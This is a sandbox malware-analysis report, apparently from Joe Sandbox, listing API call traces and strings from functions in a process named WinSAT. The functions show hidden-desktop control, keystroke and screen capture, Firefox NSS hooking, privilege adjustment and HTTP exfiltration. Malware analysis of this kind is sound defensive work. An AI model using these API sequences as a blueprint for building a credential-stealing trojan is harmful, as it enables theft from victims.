Part of subcall function 01D27AF0: GetWindowLongW.USER32(00000000,000000F0), ref: 01D27B61
Part of subcall function 01D27AF0: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 01D27B72
Part of subcall function 01D27AF0: GetWindowLongW.USER32(?,000000F0), ref: 01D27B8F
Part of subcall function 01D27AF0: SetWindowLongW.USER32(?,000000F0,00000000), ref: 01D27B9D

GetWindowLongW.USER32(00000000,000000F0), ref: 01D1B6B6
GetParent.USER32(00000000), ref: 01D1B6D8
GetWindowThreadProcessId.USER32(?,00000000), ref: 01D1B6FD
IsWindow.USER32(?), ref: 01D1B720

Part of subcall function 01D1B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 01D1B0B3
Part of subcall function 01D1B0AD: ReleaseMutex.KERNEL32(?), ref: 01D1B0E7
Part of subcall function 01D1B0AD: IsWindow.USER32(?), ref: 01D1B0EE
Part of subcall function 01D1B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 01D1B108
Part of subcall function 01D1B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 01D1B110

GetWindowInfo.USER32(00000000,?), ref: 01D1B770
PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 01D1B8AD

Part of subcall function 01D1B31C: GetAncestor.USER32(?,00000002), ref: 01D1B345
Part of subcall function 01D1B31C: SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 01D1B370
Part of subcall function 01D1B31C: PostMessageW.USER32(?,00000020,?,00000000), ref: 01D1B3B2
Part of subcall function 01D1B31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 01D1B448
Part of subcall function 01D1B31C: PostMessageW.USER32(?,00000112,?,?), ref: 01D1B49B
Part of subcall function 01D1B31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 01D1B4DA

Part of subcall function 01D1DCA2: GetClassNameW.USER32(007101CA,?,00000101), ref: 01D1DCBD

Part of subcall function 01D1B11C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 01D1B130
Part of subcall function 01D1B11C: ReleaseMutex.KERNEL32(?), ref: 01D1B14F
Part of subcall function 01D1B11C: GetWindowRect.USER32(?,?), ref: 01D1B15C
Part of subcall function 01D1B11C: IsRectEmpty.USER32(?), ref: 01D1B1E0
Part of subcall function 01D1B11C: GetWindowLongW.USER32(?,000000F0), ref: 01D1B1EF
Part of subcall function 01D1B11C: GetParent.USER32(?), ref: 01D1B205
Part of subcall function 01D1B11C: MapWindowPoints.USER32(00000000,00000000), ref: 01D1B20E
Part of subcall function 01D1B11C: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 01D1B232

Strings

<, xrefs: 01D1B769
@, xrefs: 01D1B806
, xrefs: 01D1B654

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D14DBD, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151

APIs

Part of subcall function 01D22507: CreateMutexW.KERNEL32(01D32C30,00000000,?,?,?,?,?), ref: 01D22528

Part of subcall function 01D2262D: WaitForSingleObject.KERNEL32(00000000,01D1BC3F), ref: 01D22635

WaitForSingleObject.KERNEL32(000003E8,?), ref: 01D14E28
CloseHandle.KERNEL32(?), ref: 01D14F89

Part of subcall function 01D1E959: CreateMutexW.KERNELBASE(Function_00022C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,01D14E69,?,?,?,743C152E,00000002), ref: 01D1E97F

WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 01D14EB9
WSAEventSelect.WS2_32(00000000,00000000,00000000), ref: 01D14EFA
WSAIoctl.WS2_32(00000000,8004667E,?,00000004,00000000,00000000,?,00000000,00000000), ref: 01D14F1A

Part of subcall function 01D267B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 01D267CC

Part of subcall function 01D24DF0: CreateThread.KERNEL32(00000000,?,00000000,01D1748F,00000000,01D1748F), ref: 01D24E04
Part of subcall function 01D24DF0: CloseHandle.KERNEL32(00000000), ref: 01D24E0F

accept.WS2_32(?,00000000,00000000), ref: 01D14F45
WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 01D14F59

Part of subcall function 01D2675E: shutdown.WS2_32(?,00000002), ref: 01D26766
Part of subcall function 01D2675E: #3.WS2_32(?), ref: 01D2676D

CloseHandle.KERNEL32(?), ref: 01D14F7A

Part of subcall function 01D26B8E: ReleaseMutex.KERNEL32(00000000,01D23021,?,?,?), ref: 01D26B92

Part of subcall function 01D1E89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 01D1E8E0

Part of subcall function 01D14C68: getsockname.WS2_32(?,?,?), ref: 01D14CBE
Part of subcall function 01D14C68: CloseHandle.KERNEL32(?), ref: 01D14CE2

Strings

K2w, xrefs: 01D14EC7

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D250A3, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 67

APIs

HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,01D32000,8404F700,00000000), ref: 01D250EB
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 01D25112
HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 01D25137
InternetCloseHandle.WININET(00000000), ref: 01D2514F

Strings

GET, xrefs: 01D250D0, 01D250E7
Connection: close, xrefs: 01D25103, 01D25110
nq<qFq, xrefs: 01D25137
HTTP/1.1, xrefs: 01D250DF
POST, xrefs: 01D250C9

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2D865, Relevance: 15.1, APIs: 10, Instructions: 92

APIs

OpenWindowStationW.USER32(?,00000000,10000000), ref: 01D2D88A
CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 01D2D89D
GetProcessWindowStation.USER32 ref: 01D2D8AE

Part of subcall function 01D2D83D: GetProcessWindowStation.USER32 ref: 01D2D841
Part of subcall function 01D2D83D: SetProcessWindowStation.USER32(00000000), ref: 01D2D855

OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 01D2D8E9
CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 01D2D8FD
GetCurrentThreadId.KERNEL32(?,?,?,01D1731A,?,2937498D,?,00000000), ref: 01D2D909
GetThreadDesktop.USER32(00000000), ref: 01D2D910

Part of subcall function 01D2D7F8: lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,00000000,10000000,00000000,01D2D84D,00000000,?,?,?,01D1731A,?,2937498D,?), ref: 01D2D81D

SetThreadDesktop.USER32(00000000), ref: 01D2D922
CloseDesktop.USER32(00000000), ref: 01D2D934
CloseWindowStation.USER32(?), ref: 01D2D94F

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1773A, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160

APIs

Part of subcall function 01D22507: CreateMutexW.KERNEL32(01D32C30,00000000,?,?,?,?,?), ref: 01D22528

GetCurrentThread.KERNEL32(000000F1,743C1521,00000002), ref: 01D1775B
SetThreadPriority.KERNEL32(00000000), ref: 01D17762

Part of subcall function 01D2262D: WaitForSingleObject.KERNEL32(00000000,01D1BC3F), ref: 01D22635

WaitForSingleObject.KERNEL32(0000EA60), ref: 01D17780

Part of subcall function 01D29A9E: RegOpenKeyExW.ADVAPI32(80000001,01D33EC0,00000000,00000001,?), ref: 01D29ADD

CreateMutexW.KERNEL32(01D32C30,00000001,?,20000000), ref: 01D17843
GetLastError.KERNEL32 ref: 01D17853
CloseHandle.KERNEL32(00000000), ref: 01D17861

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

Part of subcall function 01D24DF0: CreateThread.KERNEL32(00000000,?,00000000,01D1748F,00000000,01D1748F), ref: 01D24E04
Part of subcall function 01D24DF0: CloseHandle.KERNEL32(00000000), ref: 01D24E0F

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Part of subcall function 01D240AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01D240CF

WaitForSingleObject.KERNEL32(0000EA60), ref: 01D17919

Part of subcall function 01D26B8E: ReleaseMutex.KERNEL32(00000000,01D23021,?,?,?), ref: 01D26B92

Strings

Global\%08X%08X%08X, xrefs: 01D1781D

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2C912, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99

APIs

LoadLibraryW.KERNEL32(?), ref: 01D2C929
GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,01D2D2A8), ref: 01D2C955
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,01D2D2A8,?,?), ref: 01D2C96C
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,01D2D2A8,?,?), ref: 01D2C984
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,01D2D2A8,?,?,00000000), ref: 01D2CA0D

Part of subcall function 01D24A87: GetCurrentThread.KERNEL32(00000020,00000000,01D2C9A1,00000000,?,?,?,?,01D2C9A1,SeTcbPrivilege), ref: 01D24A97
Part of subcall function 01D24A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,01D2C9A1,SeTcbPrivilege), ref: 01D24A9E
Part of subcall function 01D24A87: OpenProcessToken.ADVAPI32(000000FF,00000020,01D2C9A1,?,?,?,?,01D2C9A1,SeTcbPrivilege), ref: 01D24AB0
Part of subcall function 01D24A87: LookupPrivilegeValueW.ADVAPI32(00000000,01D2C9A1,?), ref: 01D24AD4
Part of subcall function 01D24A87: AdjustTokenPrivileges.ADVAPI32(01D2C9A1,00000000,00000001,00000000,00000000,00000000), ref: 01D24AE9
Part of subcall function 01D24A87: GetLastError.KERNEL32 ref: 01D24AF3
Part of subcall function 01D24A87: CloseHandle.KERNEL32(01D2C9A1), ref: 01D24B02

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,01D2D2A8,?,?,00000000), ref: 01D2C9A1

Part of subcall function 01D2C8A1: EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,01D2C9FB,00000000,?,?,?), ref: 01D2C8C6
Part of subcall function 01D2C8A1: CloseHandle.KERNEL32(?), ref: 01D2C907

Strings

SeTcbPrivilege, xrefs: 01D2C997
.exe, xrefs: 01D2C93B

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2BD7B, Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 247

APIs

Part of subcall function 01D2262D: WaitForSingleObject.KERNEL32(00000000,01D1BC3F), ref: 01D22635

EnterCriticalSection.KERNEL32(01D33FE4), ref: 01D2BDB7
LeaveCriticalSection.KERNEL32(01D33FE4), ref: 01D2BDE5
EnterCriticalSection.KERNEL32(01D33FE4), ref: 01D2BE09

Part of subcall function 01D214C3: InternetCrackUrlA.WININET ref: 01D217AC
Part of subcall function 01D214C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 01D217CA
Part of subcall function 01D214C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 01D218E4
Part of subcall function 01D214C3: EnterCriticalSection.KERNEL32(01D32AC8), ref: 01D21910
Part of subcall function 01D214C3: LeaveCriticalSection.KERNEL32(01D32AC8,?,?), ref: 01D2194D

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

Part of subcall function 01D2835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 01D283B8

Part of subcall function 01D240F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 01D2410D

Part of subcall function 01D23346: HeapAlloc.KERNEL32(00000008,-00000003,01D236F5,?,?,00000000,01D241E1,?,01D22070,?,?,?,01D24191,?,?,?), ref: 01D23368
Part of subcall function 01D23346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,01D236F5,?,?,00000000,01D241E1,?,01D22070,?,?,?,01D24191,?,?), ref: 01D23379

LeaveCriticalSection.KERNEL32(01D33FE4,00000000,?,00000000), ref: 01D2C04C

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

LeaveCriticalSection.KERNEL32(01D33FE4), ref: 01D2C06B
LeaveCriticalSection.KERNEL32(01D33FE4), ref: 01D2C078

Strings

Content-Length, xrefs: 01D2BF55
0, xrefs: 01D2BF31
%x, xrefs: 01D2BF11

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D19489, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156

APIs

Part of subcall function 01D274DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01D17194,?,?,00000104,.exe,00000000), ref: 01D274F4
Part of subcall function 01D274DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01D17194,?,?,00000104), ref: 01D27575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 01D194EF

Part of subcall function 01D1929D: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 01D192D4
Part of subcall function 01D1929D: StrStrIW.SHLWAPI(?,?), ref: 01D1935C
Part of subcall function 01D1929D: StrStrIW.SHLWAPI(?,?), ref: 01D1936D
Part of subcall function 01D1929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 01D19389
Part of subcall function 01D1929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 01D193A7
Part of subcall function 01D1929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 01D193C1

PathRemoveFileSpecW.SHLWAPI(?), ref: 01D1950C
SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 01D19582

Part of subcall function 01D28AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 01D28B23
Part of subcall function 01D28AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01D28B4A
Part of subcall function 01D28AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 01D28B94
Part of subcall function 01D28AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 01D28BC1
Part of subcall function 01D28AE4: Sleep.KERNEL32(00000000,?,?), ref: 01D28BF1
Part of subcall function 01D28AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 01D28C1F
Part of subcall function 01D28AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 01D28C31

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104), ref: 01D1961F

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Strings

#, xrefs: 01D19567
&, xrefs: 01D19560
$, xrefs: 01D19552

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2AEFC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109

APIs

TranslateMessage.USER32(?), ref: 01D2B053

Part of subcall function 01D2262D: WaitForSingleObject.KERNEL32(00000000,01D1BC3F), ref: 01D22635

EnterCriticalSection.KERNEL32(01D33FB4), ref: 01D2AF36
LeaveCriticalSection.KERNEL32(01D33FB4), ref: 01D2AFD9

Part of subcall function 01D1EA11: LoadLibraryA.KERNEL32(gdiplus.dll), ref: 01D1EA43
Part of subcall function 01D1EA11: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 01D1EA54
Part of subcall function 01D1EA11: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 01D1EA61
Part of subcall function 01D1EA11: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 01D1EA6E
Part of subcall function 01D1EA11: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 01D1EA7B
Part of subcall function 01D1EA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 01D1EA88
Part of subcall function 01D1EA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 01D1EA95
Part of subcall function 01D1EA11: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 01D1EAA2
Part of subcall function 01D1EA11: LoadLibraryA.KERNEL32(ole32.dll), ref: 01D1EAEA
Part of subcall function 01D1EA11: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 01D1EAF5
Part of subcall function 01D1EA11: LoadLibraryA.KERNEL32(gdi32.dll), ref: 01D1EB07
Part of subcall function 01D1EA11: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 01D1EB12
Part of subcall function 01D1EA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 01D1EB1E
Part of subcall function 01D1EA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 01D1EB2B
Part of subcall function 01D1EA11: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 01D1EB38
Part of subcall function 01D1EA11: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 01D1EB45
Part of subcall function 01D1EA11: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 01D1EB52
Part of subcall function 01D1EA11: GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 01D1EB5F
Part of subcall function 01D1EA11: FreeLibrary.KERNEL32(00000000), ref: 01D1EE9C
Part of subcall function 01D1EA11: FreeLibrary.KERNEL32(?), ref: 01D1EEA6
Part of subcall function 01D1EA11: FreeLibrary.KERNEL32(00000000), ref: 01D1EEB0

GetTickCount.KERNEL32(?,0000001E,000001F4), ref: 01D2AF9B

Part of subcall function 01D240AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01D240CF

GetKeyboardState.USER32(?), ref: 01D2AFF3
ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 01D2B01B

Part of subcall function 01D2AD5F: EnterCriticalSection.KERNEL32(01D33FB4,?,?,?,01D2B052,?), ref: 01D2AD7C
Part of subcall function 01D2AD5F: LeaveCriticalSection.KERNEL32(01D33FB4,?,?,?,01D2B052,?), ref: 01D2AD9D
Part of subcall function 01D2AD5F: EnterCriticalSection.KERNEL32(01D33FB4,?,?,?,?,01D2B052,?), ref: 01D2ADAE
Part of subcall function 01D2AD5F: LeaveCriticalSection.KERNEL32(01D33FB4,?,?,?,01D2B052,?), ref: 01D2AE47

Strings

, xrefs: 01D2B039

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D251FD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 01D2521D

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

WaitForSingleObject.KERNEL32(?,00000000), ref: 01D2524B
InternetReadFile.WININET(00001000,?,00001000,?), ref: 01D25267
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 01D25282
FlushFileBuffers.KERNEL32(00000000), ref: 01D252A2

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

CloseHandle.KERNEL32(00000000), ref: 01D252B5

Part of subcall function 01D28716: SetFileAttributesW.KERNEL32(00000080,00000080,01D2B4CD,?), ref: 01D2871F
Part of subcall function 01D28716: DeleteFileW.KERNEL32(?), ref: 01D28729

Strings

PqZqdq2qnq<qFq, xrefs: 01D25267

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2C5CA, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64

APIs

Part of subcall function 01D2262D: WaitForSingleObject.KERNEL32(00000000,01D1BC3F), ref: 01D22635

LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 01D2C5ED
EnterCriticalSection.KERNEL32(01D3400C), ref: 01D2C620
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 01D2C640
lstrcmpiW.KERNEL32(?,nss3.dll), ref: 01D2C64C

Part of subcall function 01D1C103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,01D220A9), ref: 01D1C111
Part of subcall function 01D1C103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,01D220A9), ref: 01D1C125
Part of subcall function 01D1C103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 01D1C132
Part of subcall function 01D1C103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 01D1C13F
Part of subcall function 01D1C103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 01D1C14C

LeaveCriticalSection.KERNEL32(01D3400C), ref: 01D2C669

Strings

nspr4.dll, xrefs: 01D2C63A
nss3.dll, xrefs: 01D2C646

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D269AA, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57

APIs

InitializeSecurityDescriptor.ADVAPI32(01D32C3C,00000001,00000000,01D222ED,?,?,00000000), ref: 01D269B4
SetSecurityDescriptorDacl.ADVAPI32(01D32C3C,00000001,00000000,00000000,?,?,00000000), ref: 01D269C5
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 01D269DB
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 01D269F7
SetSecurityDescriptorSacl.ADVAPI32(01D32C3C,?,?,?,?,?,00000000), ref: 01D26A0B
LocalFree.KERNEL32(00000000,?,?,00000000), ref: 01D26A18

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 01D269D6

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2B58C, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30

APIs

InitializeCriticalSection.KERNEL32(01D33FE4,76C61857,01D1C185,01D32360), ref: 01D2B5A2
GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 01D2B5DE
GetProcAddress.KERNEL32(PR_SetError), ref: 01D2B5F0
GetProcAddress.KERNEL32(PR_GetError), ref: 01D2B602

Strings

PR_GetNameForIdentity, xrefs: 01D2B5BE
PR_GetError, xrefs: 01D2B5F2
PR_SetError, xrefs: 01D2B5E0

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D17206, Relevance: 12.2, APIs: 8, Instructions: 180

APIs

Part of subcall function 01D26444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 01D26463
Part of subcall function 01D26444: freeaddrinfo.WS2_32(?,?,?,?,?,01D17284,?), ref: 01D264B0

GetCurrentThread.KERNEL32(00000001,?,00000003,?,?,00000000,?), ref: 01D172EB
SetThreadPriority.KERNEL32(00000000), ref: 01D172F2

Part of subcall function 01D2D865: OpenWindowStationW.USER32(?,00000000,10000000), ref: 01D2D88A
Part of subcall function 01D2D865: CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 01D2D89D
Part of subcall function 01D2D865: GetProcessWindowStation.USER32 ref: 01D2D8AE
Part of subcall function 01D2D865: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 01D2D8E9
Part of subcall function 01D2D865: CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 01D2D8FD
Part of subcall function 01D2D865: GetCurrentThreadId.KERNEL32(?,?,?,01D1731A,?,2937498D,?,00000000), ref: 01D2D909
Part of subcall function 01D2D865: GetThreadDesktop.USER32(00000000), ref: 01D2D910
Part of subcall function 01D2D865: SetThreadDesktop.USER32(00000000), ref: 01D2D922
Part of subcall function 01D2D865: CloseDesktop.USER32(00000000), ref: 01D2D934
Part of subcall function 01D2D865: CloseWindowStation.USER32(?), ref: 01D2D94F

Part of subcall function 01D1DD09: TlsAlloc.KERNEL32(01D32868,00000000,0000018C,00000000,00000000), ref: 01D1DD22
Part of subcall function 01D1DD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 01D1DD4A
Part of subcall function 01D1DD09: CreateEventW.KERNEL32(01D32C30,00000001,00000000,?,84889912,?,00000001), ref: 01D1DD74
Part of subcall function 01D1DD09: CreateMutexW.KERNEL32(01D32C30,00000000,?,18782822,?,00000001), ref: 01D1DD97
Part of subcall function 01D1DD09: CreateFileMappingW.KERNEL32(00000000,01D32C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 01D1DDC2
Part of subcall function 01D1DD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 01D1DDD8
Part of subcall function 01D1DD09: GetDC.USER32(00000000), ref: 01D1DDF5
Part of subcall function 01D1DD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 01D1DE15
Part of subcall function 01D1DD09: GetDeviceCaps.GDI32(?,0000000A), ref: 01D1DE1F
Part of subcall function 01D1DD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 01D1DE32
Part of subcall function 01D1DD09: ReleaseDC.USER32(00000000,?), ref: 01D1DE56
Part of subcall function 01D1DD09: CreateMutexW.KERNEL32(01D32C30,00000000,?,1898B122,?,00000001,01D328B8,?,00000102,01D328A4,01D32E70,00000010,?,?), ref: 01D1DF00
Part of subcall function 01D1DD09: GetDC.USER32(00000000), ref: 01D1DF15
Part of subcall function 01D1DD09: CreateCompatibleDC.GDI32(00000000), ref: 01D1DF23
Part of subcall function 01D1DD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 01D1DF3A
Part of subcall function 01D1DD09: SelectObject.GDI32(00000000,00000000), ref: 01D1DF4D
Part of subcall function 01D1DD09: ReleaseDC.USER32(00000000,00000001), ref: 01D1DF65

GetShellWindow.USER32 ref: 01D17338
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 01D1736B

Part of subcall function 01D28C40: PathCombineW.SHLWAPI(01D21F45,01D21F45,?), ref: 01D28C5F

WaitForSingleObject.KERNEL32(00000000,00001388), ref: 01D173CD
CloseHandle.KERNEL32(?), ref: 01D173DD
CloseHandle.KERNEL32(?), ref: 01D173E3
SystemParametersInfoW.USER32(00001003,00000000,00000000,00000000), ref: 01D173F2

Part of subcall function 01D1D4B4: WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,01D1E1F1,001B7740,?,00000003,001B7740,?,001B7740,?,00000000), ref: 01D1D714
Part of subcall function 01D1D4B4: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 01D1D72F
Part of subcall function 01D1D4B4: ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 01D1D7C1
Part of subcall function 01D1D4B4: GetSystemMetrics.USER32(00000017), ref: 01D1D8DB
Part of subcall function 01D1D4B4: ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 01D1DC67

Part of subcall function 01D1DF74: DeleteObject.GDI32(00000000), ref: 01D1DF87
Part of subcall function 01D1DF74: CloseHandle.KERNEL32(00000000), ref: 01D1DF97
Part of subcall function 01D1DF74: TlsFree.KERNEL32(00000000,00000000,01D32868,00000000,01D1E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 01D1DFA2
Part of subcall function 01D1DF74: CloseHandle.KERNEL32(00000000), ref: 01D1DFB0
